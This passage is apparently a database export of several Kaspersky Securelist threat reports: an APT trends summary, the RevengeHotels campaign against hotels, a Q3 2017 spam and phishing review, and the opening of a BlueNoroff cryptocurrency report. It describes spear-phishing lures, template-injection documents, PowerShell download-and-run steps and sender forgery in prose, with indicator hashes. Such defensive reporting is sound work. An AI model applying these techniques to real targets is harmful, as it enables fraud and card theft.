implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker is a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2020-11-03T10:00:37", "type": "securelist", "title": "APT trends report Q3 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-28T12:29:47", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/29094751/abstract-blue-990x400.jpg)\n\nRevengeHotels is a targeted cybercrime malware campaign against hotels, hostels, hospitality and tourism companies, mainly, but not exclusively, located in Brazil. We have confirmed more than 20 hotels that are victims of the group, located in eight states in Brazil, but also in other countries such as Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey. The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs) such as Booking.com.\n\nThe main attack vector is via email with crafted Word, Excel or PDF documents attached. Some of them exploit CVE-2017-0199, loading it using VBS and PowerShell scripts and then installing customized versions of **RevengeRAT, NjRAT, NanoCoreRAT, 888 RAT** and other custom malware such as **ProCC** in the victim's machine. The group has been active since 2015, but increased its attacks in 2019.\n\nIn our research, we were also able to track two groups targeting the hospitality sector, using separate but similar infrastructure, tools and techniques. PaloAlto has already [written](<https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/>) about one of them. We named the first group **RevengeHotels**, and the second **ProCC**. These groups use a lot of social engineering in their attacks, asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people. Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers. They also sell credentials from the affected systems, allowing other cybercriminals to have remote access to hotel front desks infected by the campaign.\n\nWe monitored the activities of these groups and the new malware they are creating for over a year. With a high degree of confidence, we can confirm that at least two distinct groups are focused on attacking this sector; there is also a third group, though it is unclear if its focus is solely on this sector or if carries out other types of attacks.\n\n## **Not the quotation you're expecting**\n\nOne of the tactics used in operations by these groups is highly targeted spear-phishing messages. They register typo-squatting domains, impersonating legitimate companies. The emails are well written, with an abundance of detail. They explain why the company has chosen to book that particular hotel. By checking the sender information, it's possible to determine whether the company actually exists. However, there is a small difference between the domain used to send the email and the real one.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094716/revengehotels-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094716/revengehotels-1.png>)\n\n_An email sent to a hotel supposedly from an attorney's office_\n\nThis spear-phishing message, written in Portuguese, has a malicious file attached misusing the name of a real attorney office, while the domain sender of the message was registered one day before, using a typo-squatting domain. The group goes further in its social engineering effort: to convince the hotel personnel about the legitimacy of their request, a copy of the National Registry of Legal Entities card (CNPJ) is attached to the quotation.\n\nThe attached file, Reserva Advogados Associados.docx (Attorneys Associates Reservation.docx), is a malicious Word file that drops a remote OLE object via template injection to execute macro code. The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094920/revengehotels-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094920/revengehotels-2.png>)\n\n_PowerShell commands executed by the embedded macro_\n\nIn the **RevengeHotels **campaign, the downloaded files are .NET binaries protected with the Yoda Obfuscator. After unpacking them, the code is recognizable as the commercial RAT RevengeRAT. An additional module written by the group called ScreenBooking is used to capture credit card data. It monitors whether the user is browsing the web page. In the initial versions, back in 2016, the downloaded files from RevengeHotels campaigns were divided into two modules: a backdoor and a module to capture screenshots. Recently we noticed that these modules had been merged into a single backdoor module **able to collect data from clipboard and capture screenshots**.\n\nIn this example, the webpage that the attacker is monitoring is booking.com (more specifically, the page containing the card details). The code is specifically looking for data in Portuguese and English, allowing the attackers to steal credit card data from web pages written in these languages.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095114/revengehotels-3.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095114/revengehotels-3.png>)\n\n_Title searched by the malware in order to capture the screen contents_\n\nIn the **ProCC **campaigns, the downloaded files are Delphi binaries. The backdoor installed in the machine is more customized than that used by RevengeHotels: it's developed from scratch and is able to **collect data from the clipboard and printer spooler, and capture screenshots**. Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites, it's possible to collect card numbers by monitoring the clipboard and the documents sent to the printer.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094643/revengehotels-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094643/revengehotels-4.png>)\n\n_Screenshot is captured when the user copies something to the clipboard or makes a print request_\n\n## **A bad guy's concierge**\n\nAccording to the relevant underground forums and messaging groups, these criminals also infect front desk machines in order to capture credentials from the hotel administration software; they can then steal credit card details from it too. Some criminals also sell remote access to these systems, acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095337/revengehotels-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095337/revengehotels-5.png>)\n\n_Access to hotel booking systems containing credit card details is sold by criminals as a service_\n\nSome Brazilian criminals tout credit card data extracted from a hotel's system as high quality and reliable because it was extracted from a trusted source, i.e., a hotel administration system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26100225/revengehotels-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26100225/revengehotels-6.png>)\n\n_Message sent to an underground channel selling data extracted from hotel systems_\n\n## **Guests and victims**\n\nThe majority of the victims are associated with the hospitality sector. Based on the routines used, we estimate that this attack has a global reach. However, based on our telemetry data, we can only confirm victims in the following countries:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095113/revengehotels-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095113/revengehotels-7.png>)\n\n_Victims confirmed in Argentina, Bolivia, Brazil, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey_\n\nBased on data extracted from Bit.ly statistics, we can see that potential victims from many other countries have at least accessed the malicious link. This data suggests that the number of countries with potential victims is higher than our telemetry has registered.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095131/revengehotels-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095131/revengehotels-8.png>)\n\n_Victims per country based on data from a malicious Bit.ly link from the RevengeHotels campaign_\n\n## **A safe stay**\n\nRevengeHotels is a campaign that has been active since at least 2015, revealing different groups using traditional RAT malware to infect businesses in the hospitality sector. While there is a marked interest in Brazilian victims, our telemetry shows that their reach has extended to other countries in Latin America and beyond.\n\nThe use of spear-phishing emails, malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign. Other threat actors may also be part of this wave of attacks, though there is no confirmation at the current time.\n\nIf you want to be a savvy and safe traveler, it's highly recommended to use a virtual payment card for reservations made via OTAs, as these cards normally expire after one charge. While paying for your reservation or checking out at a hotel, it's a good idea to use a virtual wallet such as Apple Pay, Google Pay, etc. If this is not possible, use a secondary or less important credit card, as you never know if the system at the hotel is clean, even if the rooms are\u2026\n\nAll Kaspersky products detect this threat as: \n \n * HEUR:Backdoor.MSIL.Revenge.gen\n * HEUR:Trojan-Downloader.MSIL.RevengeHotels.gen\n * HEUR:Trojan.MSIL.RevengeHotels.gen\n * HEUR:Trojan.Win32.RevengeHotels.gen\n * HEUR:Trojan.Script.RevengeHotels.gen \n \n## **Indicators of compromise (IoCs)**\n\n#### **Reference hashes:**\n\n * 74440d5d0e6ae9b9a03d06dd61718f66\n * e675bdf6557350a02f15c14f386fcc47\n * df632e25c32e8f8ad75ed3c50dd1cd47\n * a089efd7dd9180f9b726594bb6cf81ae\n * 81701c891a1766c51c74bcfaf285854b\n\nFor a full list of IoCs as well as the YARA rules and intelligence report for this campaign, please visit the Kaspersky Threat Intelligence Portal: <https://tip.kaspersky.com/>", "cvss3": {}, "published": "2019-11-28T10:00:48", "type": "securelist", "title": "RevengeHotels: cybercrime targeting hotel front desks worldwide", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2019-11-28T10:00:48", "id": "SECURELIST:ADE333FF4D3F96FCD027E6BB825FFD9B", "href": "https://securelist.com/revengehotels/95229/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-03T11:33:34", "description": "![](https://securelist.com/files/2014/08/quarter_spam.jpg)\n\n## Quarterly highlights\n\n### Blockchain and spam\n\nCryptocurrencies have been a regular theme in the media for several years now. Financial analysts predict a great future for them, various governments are thinking about launching their own currencies, and graphics cards are swept off the shelves as soon as they go on sale. Of course, spammers could not resist the topics of cryptocurrency, mining and blockchain technology.\n\nLast quarter we wrote that many Trojans were downloading 'miners' as a payload on victims' computers, and in third quarter of 2017 this practice became even more widespread.\n\n#### Fraud, cryptocurrencies and binary options\n\nFinancial fraud makes very active use of the cryptocurrency topic: users receive messages that vividly describe the use of special software for trading on the cryptocurrency market and how it can secure their financial future.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-1.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-1.png>)\n\n_Examples of emails with offers \"to secure your financial future\"_\n\nAfter clicking on a link, users end up on a site where they are once again persuaded to join the ranks of the rich who only have one problem in life \u2013 how to spend their money. In reality, such sites are partners for shady brokerage houses, and purveyors of new, inexperienced customers. It is there that new users are redirected.\n\nThe plan is to get the victim to deposit a certain amount to their account, usually several hundred dollars, for the opportunity to start trading. We should note here that we're no longer talking about cryptocurrencies \u2013 in most cases, trading involves binary options.\n\nThe problem is not even in the questionable legality of the actual trading, but that no one guarantees the honesty of the brokerage offices and, consequently, there are no guarantees that the invested funds will be returned. The fraudsters start by motivating people to invest more and more money, and then simply disappear, leaving the victim to read angry reviews on the Internet from other cheated depositors.\n\nThere are also more primitive types of fraud, where the email directly asks the recipient to transfer bitcoins to a specific wallet, with a promise to return the investment with interest five days later. But only the most na\u00efve recipients are likely to fall for such an offer.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-2-5.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-2-5.png>)\n\n_Naive users are invited to \"invest\" bitcoins for a short time at a high high rate of interest_\n\n#### Webcasts\n\nAnother example of the cryptocurrency theme being used in spam is that of webcasts. In most cases, scammers suggest taking a study course that will help the user understand more about cryptocurrencies and how to invest in them. Of course, the sums invested in \"training\" will result in huge profits in the near future, according to the organizers.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-3.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-3.png>)\n\n### Natural disasters and the 'White House administration'\n\nIn August and September, the world's attention was focused on hurricanes Irma and Harvey, and the earthquake in Mexico. There were dozens of victims of these disasters, and the damage caused was estimated to be billions of dollars. These tragic events inevitably attracted the attention of so-called Nigerian scammers trying to cash in on people's grief. They sent messages on behalf of family members whose relatives died during the hurricanes and asked for help obtaining an inheritance left by them. Natural disasters were also mentioned in emails promoting job offers and loans.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-4.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-4.png>)\n\nIn the third quarter, 'Nigerian' letters also mentioned the name of Donald Trump, the current US president. The authors pretended to be representatives of state or banking organizations, and to make their message sound more important they claimed they were appointed by the US president or were acting on his behalf. The spammers spun the standard tales in their fraudulent letters, promising millions of dollars to users, with the scammers asking for personal information so that they could supposedly track the money transfer. The letters contained identical text but with different layouts and contact details.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-5.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-5.png>)\n\n_Letters 'from the US president's office'_\n\n### B2B fakes in malicious emails\n\nThere is still a tendency to create emails with malicious attachments for fake commercial offers. At times their quality is so good that you suspect they could be a man-in-the-middle attack.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-6.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-6.png>)\n\n_The file in the attachment is detected as HEUR: Trojan.Java.Agent.gen. This malware is written to startup and tries to close programs such as Process Hacker, system explorer and security software processes. It then communicates with the remote server and waits for the command to install other malicious programs_\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-7.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-7.png>)\n\n_The attachment is detected as HEUR: Exploit.MSOffice.Generic, exploiting the vulnerability CVE-2017-0199 in MS Word. As a result, other malicious programs are downloaded to the victim's computer_\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-8.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-8.png>)\n\n_Both archives contain the same malicious object, detected as Trojan.Win32.VBKrypt.xtgt. It collects information from the victim's computer and transfers it to the remote server_\n\n### Release of new iPhone\n\nIn September, Apple unveiled the new models of its smartphone \u2013 iPhone 8 and iPhone X. This event was widely covered in the media, and spammers, weren't going to miss out.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-0.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-0.png>)\n\nEven before the official presentation, we began to record spam mailings with offers to test the updated phone for free and participate in a prize draw to win one. Some mailings even reported the recipient had won a device before it was publicly unveiled. In most cases, the links in these emails could end up downloading Reimage Repair 'advertising software'. Immediately after the release of the smartphone, Chinese factories got in on the act, sending out emails advertising various accessories for the new model. Our traps also recorded a large volume of phishing associated with the purchase and delivery of the popular gadget.\n\n## Statistics\n\n### Proportion of spam in email traffic\n\n[![](https://securelist.com/files/2017/10/Spam_world_EN.png)](<https://securelist.com/files/2017/10/Spam_world_EN.png>)\n\n_Percentage of spam in global email traffic, Q2 and Q3 2017_\n\nIn the third quarter of 2017, the largest share of spam was recorded in September \u2013 59.56%. The average share of spam in global email traffic was 58.02%, which was almost 1.05 p.p. more than the average for the previous quarter.\n\n### Sources of spam by country\n\n[![](https://securelist.com/files/2017/10/Countries_sources_of_spam_EN.png)](<https://securelist.com/files/2017/10/Countries_sources_of_spam_EN.png>)\n\n_Sources of spam by country, Q3 2017_\n\nAccording to the results for the third quarter of 2017, China (12.24%) became the biggest source of spam, after finishing third the previous quarter. Last quarter's leader Vietnam (11.17%) was second after a decrease of 1.2 p.p. The US fell one place to third (9.62%), while India (8.49%) remained fourth in this rating. Iran rounded off the top 10, accounting for 2.07% of all spam.\n\n### Spam email size\n\n[![](https://securelist.com/files/2017/10/Spam_email_size_Q3_2017_EN.png)](<https://securelist.com/files/2017/10/Spam_email_size_Q3_2017_EN.png>)\n\n_Breakdown of spam emails by size, Q2 and Q3 2017_\n\nThe share of very small emails (up to 2 KB) in spam increased by 9.46 p.p. to 46.87% in the third quarter. The proportion of emails between 5 and 10 KB in size also increased by 6.66 p.p. compared with the previous quarter and amounted to 12.6%.\n\nThe number of emails between 10 and 20 KB decreased, however, with their share falling by 7 p.p. There was also a decrease in emails sized 20 to 50 KB. Their share this quarter amounted to 19%, which was a fall of 8.16 p.p. compared to the previous reporting period.\n\nOverall, the number of very small emails continues to grow.\n\n### Malicious attachments in email\n\n#### Top 10 malware families\n\n[![](https://securelist.com/files/2017/10/TOP10_families_Q3_2017.png)](<https://securelist.com/files/2017/10/TOP10_families_Q3_2017.png>)\n\n_TOP 10 malware families in Q3 2017_\n\nBackdoor.Java.QRat (3.11%) became the most widespread malicious program family in email traffic. Next came the Trojan-Downloader.VBS.Agent family (2.95%), followed by Trojan-Downloader.JS.SLoad (2.94%). The newcomers in this rating \u2013 Trojan.Win32.VBKrypt and Trojan-Downloader.VBS.SLoad (a VBS script that downloads and launches other malicious programs on the victim machine, usually cryptographers) occupy fifth and eighth places with 2.64% and 2.02% respectively. The Trojan.PDF.Badur family (1.79%) rounds off the top 10.\n\n### Countries targeted by malicious mailshots\n\n[![](https://securelist.com/files/2017/10/Countries_targets_EN.png)](<https://securelist.com/files/2017/10/Countries_targets_EN.png>)\n\n_Distribution of email antivirus verdicts by country, Q3 2017_\n\nGermany remained the country targeted most by malicious mailshots in the third quarter of 2017. Its share increased by 6.67 p.p. and amounted to 19.38%.\n\nChina came second, with 10.62% of mail antivirus verdicts recorded there \u2013 a drop of 1.47 p.p. compared to Q2. Russia, which came fifth the previous quarter, completed the top three (9.97%) after its share increased by 4.3 p.p. Fourth and fifth were occupied by Japan (5.44%) and Italy (3.90%) respectively.\n\n## Phishing\n\nIn the third quarter of 2017, the anti-phishing system prevented 59,569,508 attempted visits to phishing pages on the computers of Kaspersky Lab users. Overall, 9.49% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q3 2017.\n\n### Geography of attacks\n\nThe country with the largest percentage of users affected by phishing attacks was once again Brazil (19.95%, +1.86p.p.).\n\n[![](https://securelist.com/files/2017/10/Q3_Phishing_map.png)](<https://securelist.com/files/2017/10/Q3_Phishing_map.png>)\n\n_Geography of phishing attacks*, Q3 2017 \n* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in that country_\n\nAustralia (16.51%) came second after its share increased by 3.81 p.p. In third place was New Zealand (15.61%, + 3.55pp). China (12.66%) fell from second place to fourth, with its share losing 0.19 p.p. Next came France (12.42%), Peru (11.73%), Argentina (11.43%), Canada (11.14%), Qatar (10.51%,) and Georgia (10.34%).\n\nBrazil | 19.95% \n---|--- \nAustralia | 16.51% \nNew Zealand | 15.61% \nChina | 12.66% \nFrance | 12.42% \nPeru | 11.73% \nArgentina | 11.43% \nCanada | 11.14% \nQatar | 10.51% \nGeorgia | 10.34% \n \n**TOP 10 countries by percentage of users attacked**\n\n### Organizations under attack\n\n#### Rating the categories of organizations attacked by phishers\n\nThe rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab's heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab's databases. It does not matter how the user attempts to open the page \u2013 by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.\n\nIn the third quarter of 2017, almost half (47.54%) of the heuristic components of the anti-phishing system were recorded on pages with references to brands from financial categories such as Banks (24.1%, + 0.61 p.p.), Payment systems (13.94%, -4.46 p.p.) and Online stores (9.49%, -0.08 p.p.).\n\n[![](https://securelist.com/files/2017/10/Q3_Phishing_Organizations_EN.png)](<https://securelist.com/files/2017/10/Q3_Phishing_Organizations_EN.png>)\n\n_Distribution of organizations affected by phishing attacks by category, Q3 2017_\n\n### Hot topics this quarter\n\n#### Airline tickets\n\nLast quarter we described a scam involving a [free giveaway of airline tickets](<https://securelist.com/two-tickets-as-bait/78686/>) supposedly by popular airlines, with information being spread via reposts from victims on a social network. In the third quarter, scammers continued to spread the 'giveaway' using WhatsApp instead. Judging by the decrease in the number of anti-phishing verdicts in the Airlines category, however, we can assume that this approach wasn't as effective.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-2.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-2.png>)\n\nThe downturn may also be due to the fact that scammers switched to 'prize draws' not only for air tickets but also other prizes, for example, sports shoes, cinema tickets, gift cards for Starbucks, etc.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-16.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-16.png>)\n\nBefore you could claim your prize you had to share information about the prize draw with eight contacts on WhatsApp.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-17.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-17.png>)\n\nAfter clicking the button, users are redirected to WhatsApp.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-18.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-18.png>)\n\n_The redirect function in the instant messenger and the message that has to be sent to contacts_\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-19.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-19.png>)\n\n_This is what the message looks like in the app_\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-20.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-20.png>)\n\n_The message needs to be sent a minimum of eight times_\n\nAfter sending the message to their contacts the victim, instead of winning a prize, is redirected to some dubious resource, for example, a page where malicious extensions are installed, a new survey, etc.\n\n#### WhatsApp\n\nWhatsApp users are also subjected to phishing attacks that hide behind the app brand.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-21.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-21.png>)\n\nMore often than not the scammers try to steal money on the pretext of updating the application or paying for a subscription. At one time WhatsApp really did request a subscription payment, although now it's free.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-22.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-22.png>)\n\nScammers offer a choice of subscription \u2013 for one year, three years or five. However, victims will lose much more than the stated amount if they enter their bank card details on such a site.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-23.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-23.png>)\n\n#### Netflix\n\nNetflix users are another popular target of phishers. The number of attacks on them increased in the third quarter. The criminals usually coax bank card details from users on the pretext of a failed payment or other problems linked to subscription renewal.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-24.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-24.png>)\n\n#### Green Card\n\nOn the eve of the Green Card lottery conducted by the US government in October-November of each year, we are seeing a surge in activity by scammers offering help to apply.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-25.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-25.png>)\n\nAfter completing the form on the fraudulent site, the user is asked to pay for their application. If the victim enters their bank card details, much more money than the amount indicated on the site can end up being withdrawn from their account.\n\n#### Rap battle\n\nEven niche events can be good cover for phishing activity. On 15 October, a rap battle was held between Russian artist Oxxxymiron and Dizaster, one of the best battle MCs in the US. This followed another battle that took place just a few months earlier between Oxxxymiron and Slava KPSS. Less than 12 hours later a video of the event had gained around 5 million views \u2013 and it wasn't just thematic sites writing about the battle but also a lot of the mainstream Russian media.\n\nShortly before the publication of the official video, phishing web pages dedicated to the event began to appear online:\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-27.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-27.png>)\n\nIf a user tried to view the video, they were prompted to first sign in to the popular Russian social network VKontakte.\n\n[![](https://securelist.com/files/2017/10/171026-spam-report-q317-28.png)](<https://securelist.com/files/2017/10/171026-spam-report-q317-28.png>)\n\nAfter entering the login and password, the victim was redirected to the official page of the Versus site on the social network, and their personal data went to the scammers.\n\n### TOP 3 attacked organizations\n\nFraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections by Kaspersky Lab's heuristic anti-phishing component are for phishing pages hiding behind the names of fewer than 15 companies. At the same time, the composition of the top three has remained unchanged for several quarters:\n\n**Organization** | **% of detected phishing links** \n---|--- \nFacebook | 7.96 \nMicrosoft Corporation | 7.79 \nYahoo! | 4.79 \n \n## Conclusion\n\nIn terms of the average share of spam in global email traffic (58.02%), the third quarter of 2017 was almost identical to the previous reporting period: once again growth was slightly more than one percentage point \u2013 1.05 (and 1.07 p.p. in Q2 2017). As in previous quarters, spammers were quick to react to high-profile events and adapted their fraudulent emails to the news agenda. This quarter they were quickly to use the theme of natural disasters following hurricanes Irma and Harvey, and the earthquake in Mexico. The popular theme of cryptocurrency was also used: trusting victims were offered seminars and 'help' with trading that came with profits guaranteed.\n\nScammers continued to use all available communication channels to spread phishing content, including social networks and instant messengers: in the current quarter, the anti-phishing component prevented more than 59 million attempts to redirect to phishing pages, which is 13 million more than in Q2.\n\nThe most common malware family in the third quarter of 2017 was Backdoor.Java.QRat (3.11%), followed by Trojan-Downloader.VBS.Agent (2.95%), and Trojan-Downloader.JS.SLoad (2.94%).", "cvss3": {}, "published": "2017-11-03T10:00:53", "type": "securelist", "title": "Spam and phishing in Q3 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-11-03T10:00:53", "href": "https://securelist.com/spam-and-phishing-in-q3-2017/82901/", "id": "SECURELIST:6C418779587ADE032AB673F44440002B", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-01-21T12:12:09", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12134602/abstract_fintech-990x400.jpg)\n\nBlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh's Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our [earlier publication](<https://securelist.com/lazarus-under-the-hood/77908/>) about BlueNoroff attacks on the banking sector.\n\nAlso, we have [previously reported](<https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/>) on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff shifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main source of the group's illegal income. These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates. [We reported](<https://securelist.com/operation-applejeus/87553/>) about the first variant of such software back in 2018, but there were many other samples to be found, which [was later reported](<https://us-cert.cisa.gov/ncas/alerts/aa21-048a>) by the US CISA (Cybersecurity and Infrastructure Security Agency) in 2021.\n\nThe group is currently active (recent activity was spotted in November 2021).\n\n## The latest BlueNoroff's infection vector\n\nIf there's one thing BlueNoroff has been very good at, it's the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own user, or other means. Throughout its SnatchCrypto campaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and interaction with external entities.\n\nAccording to our research this year, we have seen BlueNoroff operators stalking and studying successful cryptocurrency startups. The goal of the infiltration team is to build a map of interactions between individuals and understand possible topics of interest. This lets them mount high-quality social engineering attacks that look like totally normal interactions. A document sent from one colleague to another on a topic, which is currently being discussed, is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification of the necessary people and the topics they are discussing at a given time.\n\nIn a simple scenario, it can appear as a notification of a shared document via Google Drive from one colleague/friend to another:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113131/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113131/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_01.png>)\n\nNote the tiny "X" image - it's an icon for an image that failed to load. We opened the email on an offline system; if the system had been connected to the internet, there would be a real icon for a Google document loaded from a third-party tracking server that immediately notifies the attacker that the target opened the email.\n\nBut we also observed a slightly more elaborate approach of an email being forwarded from one colleague to another. This works even better for the attacker, because the original email and the attachment appear to have already been checked by the forwarding party. Ultimately, it elevates the level of trust sufficiently for the document to be opened.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113157/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113157/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_02.png>)\n\nWe haven't shown the forwarder address as it belongs to an attacked user, but note there is a piece of text that reads "via sendgrid.net". There is no website at sendgrid.net, but it can be a domain owned by a US-based company called [Sendgrid](<https://sendgrid.com/>), that specializes in email distribution, and email marketing campaigns. According to its website, it offers rich user-tracking capabilities and claims to be sending 90 billion emails every month. It seems to be a legitimate and reputable business, which is probably why Gmail accepts MIME header customization (or sender address forgery in the case of an attack) with nothing more than the short remark "via sendgrid.net". We informed Sendgrid of this activity. Of course, many users could easily overlook the remark or simply not know what it means. The person, whose name was abused here, seems to be in the top management of the Digital Currency Group (dcg.co), according to public information. To make it clear, we believe that the employee of the company, or the company itself has nothing to do with this attack or the email.\n\nWhich other company names have they abused? There are many. We have compiled a list of names and logos so you can watch out for them in your inbox.\n\n[![The companies, whose logos are displayed here, were chosen by BlueNoroff's for impersonation in social engineering tricks. Note, this is no proof that the companies listed were 